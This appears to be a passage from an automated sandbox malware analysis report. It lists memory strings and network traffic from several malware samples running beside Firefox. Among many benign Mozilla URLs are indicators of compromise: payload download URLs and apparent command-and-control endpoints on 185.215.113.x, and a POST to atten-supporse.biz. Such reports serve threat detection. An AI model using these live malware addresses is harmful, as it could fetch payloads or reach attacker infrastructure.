Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2860458807.000002BA5D10B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2860458807.000002BA5D10B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2860458807.000002BA5D10B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2839565999.000002BA5B5A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841657939.000002BA5B88F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59F8B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2889544343.00002AF0BFD00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59F8B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2826478847.000002BA5A31B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2889544343.00002AF0BFD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.comZ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2839565999.000002BA5B5FD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B580000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841657939.000002BA5B852000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: atten-supporse.biz
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: js.monitor.azure.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz
Source: firefox.exe, 00000018.00000002.2792299128.000002BA49C6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2870614524.000002BA61990000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: ae5cfd188c.exe, 00000007.00000003.2752889103.0000000000C44000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2753147956.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: ae5cfd188c.exe, 00000007.00000003.2752889103.0000000000C44000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2753147956.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/2
Source: ae5cfd188c.exe, 00000007.00000003.2752889103.0000000000C44000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2753147956.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/H
Source: skotes.exe, 00000006.00000002.2915523016.00000000006C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: skotes.exe, 00000006.00000002.2915523016.00000000006C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exe61395d7f
Source: skotes.exe, 00000006.00000002.2915523016.00000000006C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exep
Source: ae5cfd188c.exe, 00000007.00000003.2751970018.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2752889103.0000000000C44000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2751970018.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2752988072.0000000000C73000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: ae5cfd188c.exe, 00000007.00000003.2752889103.0000000000C44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exez
Source: ae5cfd188c.exe, 00000007.00000003.2752889103.0000000000C44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exezC
Source: ae5cfd188c.exe, 00000007.00000003.2752889103.0000000000C44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exezI
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exe
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exeb
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2752889103.0000000000C44000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2753147956.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe_
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exe
Source: ae5cfd188c.exe, 00000007.00000003.2752889103.0000000000C44000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2753147956.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/z
Source: ae5cfd188c.exe, 00000007.00000003.2753332198.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16:80/off/def.exe
Source: 37df924488.exe, 00000009.00000002.2578174288.000000000143E000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 00000009.00000002.2578174288.0000000001498000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 0000001B.00000002.2764793088.000000000142B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: 37df924488.exe, 00000009.00000002.2578174288.000000000143E000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 00000009.00000002.2578174288.0000000001498000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 0000001B.00000002.2764793088.000000000142B000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 0000001B.00000002.2764793088.0000000001484000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: 37df924488.exe, 00000009.00000002.2578174288.0000000001498000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/P
Source: 37df924488.exe, 00000009.00000002.2578174288.0000000001498000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 00000009.00000002.2578174288.0000000001484000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 0000001B.00000002.2764793088.000000000142B000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 0000001B.00000002.2764793088.0000000001484000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: 37df924488.exe, 00000009.00000002.2578174288.0000000001498000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 0000001B.00000002.2764793088.0000000001484000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: 37df924488.exe, 00000009.00000002.2578174288.0000000001498000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/a
Source: 37df924488.exe, 00000009.00000002.2578174288.0000000001498000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php8
Source: 37df924488.exe, 00000009.00000002.2578174288.0000000001498000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/o
Source: 37df924488.exe, 00000009.00000002.2578174288.0000000001498000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ws
Source: 37df924488.exe, 00000009.00000002.2578174288.000000000143E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206Oz
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Local
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2915523016.00000000006A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php&
Source: skotes.exe, 00000006.00000002.2915523016.00000000006D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php3539001
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php95dA
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2915523016.00000000006A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php?
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpF
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpJ
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpa4
Source: skotes.exe, 00000006.00000002.2915523016.00000000006C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpl
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedF
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedl
Source: skotes.exe, 00000006.00000002.2915523016.00000000006D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpnu
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpnub
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpq
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phps
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpu.
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/ones
Source: firefox.exe, 00000018.00000002.2827730700.000002BA5A451000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
Source: firefox.exe, 00000018.00000002.2827730700.000002BA5A451000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
Source: firefox.exe, 00000018.00000002.2827730700.000002BA5A451000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: firefox.exe, 00000018.00000002.2827730700.000002BA5A451000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
Source: ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttp://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BCE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A231000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A267000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000018.00000002.2852168506.000002BA5C4F9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B76000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2739033143.000002BA5C4F9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2857928108.000002BA5D05A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2795803239.000002BA555B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000018.00000002.2797999061.000002BA55D3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A26C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CE1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A26C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerFailed
Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerThe
Source: firefox.exe, 00000018.00000002.2889544343.00002AF0BFD00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889827871.000034BEA5600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.o
Source: firefox.exe, 00000018.00000002.2889544343.00002AF0BFD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.oZ
Source: firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B765000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2823349895.000002BA5A121000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A251000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2791036324.0000028E95004000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889544343.00002AF0BFD00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2791036324.0000028E95081000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889827871.000034BEA5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59F82000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/additionalProperties
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/aboutWelcomeBehavior
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/aboutWelcomeBehaviorhttp://mozilla.org/#/properties/dnsMaxAnyPriorit
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsFeatureGate
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsShowLessFrequentlyCap
Source: firefox.exe, 00000018.00000002.2886166420.0000180E51A04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://baidu.com
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: ae5cfd188c.exe, 00000007.00000003.2547024349.0000000005600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2794739483.000002BA554AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2785432044.000001B8C53C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: ae5cfd188c.exe, 00000007.00000003.2547024349.0000000005600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2794739483.000002BA554AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2785432044.000001B8C53C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: firefox.exe, 00000018.00000002.2842971512.000002BA5BA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813831095.000002BA597AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2842971512.000002BA5BA95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: firefox.exe, 00000018.00000003.2766500542.000002BA5B07F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1694699#c21
Source: ae5cfd188c.exe, 00000007.00000003.2496735561.000000000561F000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2496918281.0000000005608000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630590484.0000000005428000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630411285.000000000543F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
